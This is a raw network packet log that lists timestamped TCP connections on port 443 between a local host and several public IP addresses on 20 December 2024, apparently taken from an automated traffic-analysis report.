                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:31.417798042 CET44349823116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.175415039 CET44349820116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.175487995 CET49820443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.175506115 CET44349820116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.175558090 CET49820443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.263700962 CET49820443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.263755083 CET44349820116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.468209982 CET44349823116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.468274117 CET49823443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.468290091 CET44349823116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.468327999 CET49823443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.468384981 CET44349823116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.468430996 CET49823443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.800188065 CET49823443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.800210953 CET44349823116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:34.279865980 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:34.279953003 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:34.280035019 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:34.280947924 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:34.280980110 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.387255907 CET49854443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.387306929 CET44349854116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.387617111 CET49854443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.387773991 CET49854443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.387784004 CET44349854116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.489744902 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.489821911 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.495157957 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.495172977 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.495400906 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.497479916 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.497534990 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.497545004 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.497740030 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.523056984 CET49856443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.523169041 CET44349856142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.523818016 CET49856443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.524281025 CET49856443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.524317026 CET44349856142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.539329052 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.980150938 CET49860443192.168.2.62.16.158.169
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.980179071 CET443498602.16.158.169192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.980468035 CET49860443192.168.2.62.16.158.169
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.980827093 CET49860443192.168.2.62.16.158.169
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.980839968 CET443498602.16.158.169192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.158864021 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.158998013 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.159687042 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.159790993 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.159837008 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.159837008 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.159859896 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.494035959 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.494049072 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.494720936 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.497730017 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.497745991 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.511137009 CET49856443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.511668921 CET49860443192.168.2.62.16.158.169
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.512170076 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.512177944 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.512231112 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.513556004 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.513566017 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.551341057 CET44349856142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.555330038 CET443498602.16.158.169192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.790759087 CET44349854116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.790838003 CET49854443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.792025089 CET49854443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.792032957 CET44349854116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.794130087 CET49854443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.794130087 CET49854443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.794137955 CET44349854116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.794152021 CET44349854116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.088474989 CET49878443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.088577032 CET44349878162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.088742018 CET49879443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.088774920 CET44349879172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.088778019 CET49878443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.088835955 CET49879443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.089107037 CET49878443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.089126110 CET44349878162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.089379072 CET49879443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.089396954 CET44349879172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.092083931 CET49880443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.092106104 CET44349880162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.092197895 CET49880443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.092875004 CET49880443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.092889071 CET44349880162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.439356089 CET44349856142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.439429998 CET49856443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.618782043 CET443498602.16.158.169192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.618953943 CET49860443192.168.2.62.16.158.169
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.808824062 CET44349854116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.808919907 CET44349854116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.808939934 CET49854443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.808985949 CET49854443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.809757948 CET49854443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.809766054 CET44349854116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.818944931 CET49886443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.819063902 CET44349886162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.819149017 CET49886443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.819511890 CET49886443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.819544077 CET44349886162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.850388050 CET49887443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.850424051 CET44349887172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.850548029 CET49887443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.850743055 CET49887443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.850760937 CET44349887172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.903862953 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.903922081 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.904367924 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.904375076 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.905774117 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.905781031 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.905898094 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.905920982 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.905930042 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.905950069 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906019926 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906044006 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906053066 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906061888 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906193018 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906224012 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906232119 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906239986 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906347990 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906367064 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906395912 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906408072 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906420946 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906426907 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906455040 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906472921 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906472921 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906478882 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906487942 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906516075 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906527042 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906544924 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906568050 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906586885 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.906605959 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.929440022 CET49888443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.929466009 CET44349888162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.929600000 CET49888443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.929905891 CET49888443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.929920912 CET44349888162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.308495045 CET44349878162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.308679104 CET44349880162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.308883905 CET49878443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.308912039 CET44349878162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.309098005 CET49880443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.309108973 CET44349880162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.310060024 CET44349879172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.310317993 CET49879443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.310329914 CET44349879172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.310592890 CET44349878162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.310683966 CET49878443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.310777903 CET44349880162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.310883999 CET49880443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.311850071 CET44349879172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.311924934 CET49879443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.312086105 CET49878443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.312182903 CET44349878162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.313060999 CET49880443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.313158989 CET44349880162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.313252926 CET49879443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.313334942 CET44349879172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.313390017 CET49878443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.313421965 CET44349878162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.313513041 CET49880443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.313523054 CET44349880162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.313579082 CET49879443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.313587904 CET44349879172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.394964933 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.395742893 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.395751953 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.396281004 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.396296978 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.396377087 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.396382093 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.396421909 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.397326946 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.398938894 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.399020910 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.399271011 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.399276018 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.444086075 CET49879443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.444108009 CET49880443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.444185972 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.475028038 CET49878443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.510229111 CET49889443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.510293007 CET44349889116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.510571003 CET49889443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.510801077 CET49889443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.510822058 CET44349889116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.735418081 CET44349878162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.735518932 CET44349878162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.735589027 CET49878443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.735680103 CET49878443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.735717058 CET44349878162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.736412048 CET44349880162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.736521006 CET44349880162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.736717939 CET49880443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.736742973 CET44349879172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.736910105 CET44349879172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.736965895 CET49879443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.737339973 CET49880443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.737349987 CET44349880162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.737607002 CET49879443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.737620115 CET44349879172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.032063007 CET44349886162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.037509918 CET49886443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.037520885 CET44349886162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.041166067 CET44349886162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.041275978 CET49886443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.044528961 CET49886443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.044708014 CET44349886162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.045218945 CET49886443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.045227051 CET44349886162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.055483103 CET49892443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.055567980 CET44349892172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.055661917 CET49892443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.056765079 CET49893443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.056798935 CET44349893172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.056855917 CET49893443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.066539049 CET44349887172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.075592041 CET49894443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.075637102 CET44349894172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.075728893 CET49894443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.075948954 CET49895443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.075973988 CET44349895172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.076026917 CET49895443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.076252937 CET49896443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.076280117 CET44349896172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.076392889 CET49896443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.076478958 CET49892443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.076527119 CET44349892172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.077181101 CET49887443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.077194929 CET44349887172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.077533960 CET49893443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.077549934 CET44349893172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.077888012 CET49894443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.077913046 CET44349894172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.078061104 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.078197002 CET49895443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.078210115 CET44349895172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.078309059 CET49896443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.078320026 CET44349896172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.080607891 CET44349887172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.080722094 CET49887443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.081170082 CET49887443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.081329107 CET49887443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.081350088 CET44349887172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.081967115 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.082015038 CET49870443192.168.2.6142.250.181.65
